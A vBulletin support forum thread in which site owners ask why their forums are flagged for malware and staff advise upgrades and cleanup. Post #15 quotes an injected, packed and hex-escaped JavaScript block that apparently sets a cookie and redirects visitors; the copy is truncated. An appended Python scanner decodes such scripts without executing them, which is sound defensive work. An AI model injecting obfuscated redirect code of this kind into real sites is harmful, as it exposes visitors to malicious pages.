Is my site infected with Malware

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Is my site infected with Malware

    Members are reporting that the site might be hosting malware http://www.rvoc.co.uk/forum/index.php

    Can anyone help? Thanks

  • #2
    Have you searched these forums for others with this issue and what they did to fix it?
    -- Web Developer for hire
    ---Online Marketing Tools and Articles

    Comment


    • #3
      I got the infected warning message as well. If you do a quick search, it will bring up a lot of threads on the subject.

      P.S. You might want to contact your host as well and ask them to check their logs and see how your forum got infected.

      Comment


      • #4
        I don't really know what to search for. Is there a tool that might scan the site and tell me what the bastards have infected the site with? Thanks

        Comment


        • #5
          Originally posted by jimjam View Post
          I don't really know what to search for. Is there a tool that might scan the site and tell me what the bastards have infected the site with? Thanks
          Maybe, but I'm not sure.

          I'd start with searching these forums for "Malware" and you'll get a couple threads that might help.

          Comment


          • #6
            I also have been reported with Malware as well. Called my host and they said three other sites using vBulletin have been reported to the one guy I talked to. I think there is definitely a problem with vBulletin or one of the plugins. I am using 3.8 patch level 2. What version and host are you using?

            Comment


            • #7
              Originally posted by jpietrowiak View Post
              I also have been reported with Malware as well. Called my host and they said three other sites using vBulletin have been reported to the one guy I talked to. I think there is definitely a problem with vBulletin or one of the plugins. I am using 3.8 patch level 2. What version and host are you using?
              Your software is woefully out of date. You should be on 3.8.7 PL2 if you want to run the 3.8 series. You're running 3.8.4. It appears you're running out-of-date plugins as well, even potentially vBSEO, which has a massive exploit repaired in January that compromised the site.

              Run Maintenance -> Diagnostics -> Suspect File Versions. Delete all files that aren't part of vBulletin or your addons.

              Upgrade vBulletin to 3.8.7 PL2.

              Upgrade all your addons to the latest patched versions.

              Run this tool: http://www.vbulletin.org/forum/showthread.php?t=220967
              Last edited by TheLastSuperman; Tue 5 Jun '12, 11:41am. Reason: linked to vB4 fix-it instead of vB3, corrected. *OMDL I thought this was my post sorry for toe stepping Wayne - Supes

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment


              • #8
                Oh, I am a dummy. I could swear I had 3.8.7 PL1 and manually changed it to make PL2. My bad, but I have to also wonder about the other sites my host mentioned. I will take care of it now. Didn't mean to hijack this thread as the other guy still has problems, but I thought I was using latest and greatest. Sorry!

                Comment


                • #9
                  Originally posted by jpietrowiak View Post
                  Oh, I am a dummy. I could swear I had 3.8.7 PL1 and manually changed it to make PL2. My bad, but I have to also wonder about the other sites my host mentioned. I will take care of it now. Didn't mean to hijack this thread as the other guy still has problems, but I thought I was using latest and greatest. Sorry!
                  There have been some issues. Both in vBulletin and in several addons that have caused problems. The older the software, the more problems it most likely has in this regard. Unfortunately, we cannot force customers to upgrade their sites. Without knowing more information about the sites, I can't be really specific though. Your host should encourage them to come forward so we can provide support.

                  The steps listed above are relevant to the thread starter as well.

                  Wayne Luke

                  Comment


                  • #10
                    vBSEO is up to date. I will check the plugins and upgrade the software. Should I do this before or after finding this exploit?

                    My site's been hijacked and now my thread! :-)

                    Comment


                    • #11
                      I'd find and remove the exploit before upgrading myself.

                      Wayne Luke

                      Comment


                      • #12
                        Originally posted by jimjam View Post
                        vBSEO is up to date. I will check the plugins and upgrade the software. Should I do this before or after finding this exploit?

                        My site's been hijacked and now my thread! :-)
                        Your first priority should be to clean up the forum first then you can upgrade it. But the most important thing would be to find the point of entry and patch it up a.s.a.p, otherwise it can happen again and again.

                        Comment


                        • #13
                          Originally posted by borbole View Post
                          Your first priority should be to clean up the forum first then you can upgrade it. But the most important thing would be to find the point of entry and patch it up a.s.a.p, otherwise it can happen again and again.
                          Thanks, if only I knew where to look. I have so many mods and addons it's ridiculous.

                          Comment


                          • #14
                            This is a nice list of steps to take to find malicious code.

                            Comment


                            • #15
                              We have searched everywhere but cannot find the malicious code. If I go to Google's Webmaster Tools it gives me very specific details of the URLs and the dodgy code therein. But when I go to that page and view the source I cannot find the suspect JavaScript. Google is still reporting the site as suspect but then it has not been back since yesterday. But the only thing that would have changed on the site are the Google AdSense ads. Could they be the source of the code?

                              example webmaster tools report that on this page
                              http://www.rvoc.co.uk/forum/warwickshire/790-hollyfast-caravan-park.html

                              This suspect injected code appears

                              Code:
                              <script type="text/javascript">var vbsp='DEC24B2D';eval(func
                              tion(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a
                              )))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};i
                              f(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[
                              function(e){return d[e]}];e=function(){return'\\w+'};c=1};wh
                              ile(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g
                              '),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e
                              \\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\M\\N
                              \\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f
                              \\r\\e\\n\\h\\i","\\G\\H\\k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b
                              \\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\c\\C
                              \\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m
                              \\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3
                              ]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',
                              58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x
                              2F|x6E|x73|x54|x64|x68|var|x6C|x72|x61|_0x601cx5|_0x601cx3|_
                              0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|function
                              |new

                              But I cannot find it!

                              Comment
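
The script quoted in post #15 has the `eval(function(p,a,c,k,e,d)` shape of a packed script whose strings are additionally written as `\xNN` escapes. As an added example (not code from any poster in this thread), the Python below finds that signature in any text you feed it, such as a template export, a database dump or a saved copy of a page, and decodes it by plain substitution without executing it; the function names and the benign sample are constructed for illustration.

```python
import re

# Digits used by the packer's base-N word encoder: 0-9, a-z, then A-Z.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
SIGNATURE = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")
QUOTED = r"'((?:[^'\\]|\\.)*)'"
# Decoder body, then ('payload',radix,count,'w0|w1|...'.split('|')
ARGS = re.compile(r".{0,800}?\}\(" + QUOTED + r",(\d+),(\d+)," + QUOTED
                  + r"\.split\('\|'\)", re.S)


def unpack(payload, radix, words):
    """Swap each base-N token for its dictionary word; nothing is executed."""
    def word_for(tok):
        n = 0
        for ch in tok.group(0):
            digit = ALPHABET.find(ch)
            if digit < 0 or digit >= radix:
                return tok.group(0)          # not an encoded token, keep as is
            n = n * radix + digit
        return words[n] if n < len(words) and words[n] else tok.group(0)
    script = re.sub(r"\b\w+\b", word_for, payload, flags=re.A)
    script = re.sub(r"\\([\\'])", r"\1", script)   # undo JS string-literal escaping
    # Second layer: \xNN escapes hide the readable strings (URLs, property names).
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), script)


def scan(text):
    """Return (offset, decoded script) per hit; decoded is None for a truncated copy."""
    hits = []
    for sig in SIGNATURE.finditer(text):
        m = ARGS.match(text, sig.end())
        decoded = None
        if m and len(m.group(4).split("|")) == int(m.group(3)):
            decoded = unpack(m.group(1), int(m.group(2)), m.group(4).split("|"))
        hits.append((sig.start(), decoded))
    return hits


# Constructed, benign sample in the same packed shape (decoder body shortened),
# followed by a second copy cut off mid-dictionary like the one quoted above.
SAMPLE = (r"""<p>post</p><script>eval(function(p,a,c,k,e,d){/*decoder*/return p}"""
          r"""('0 1="\\2\\3";4.5=1',6,6,'var|msg|x68|x69|document|title'.split('|'),0,{}))</script>"""
          "\n<script>eval(function(p,a,c,k,e,d){return p}('0 1',58,58,'||var|new")

if __name__ == "__main__":
    for offset, decoded in scan(SAMPLE):
        print(offset, decoded or "packed script found, copy truncated")
```

A hit with no decoded text still tells you which file or database row carries the injected block, which is the part the thread is stuck on.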
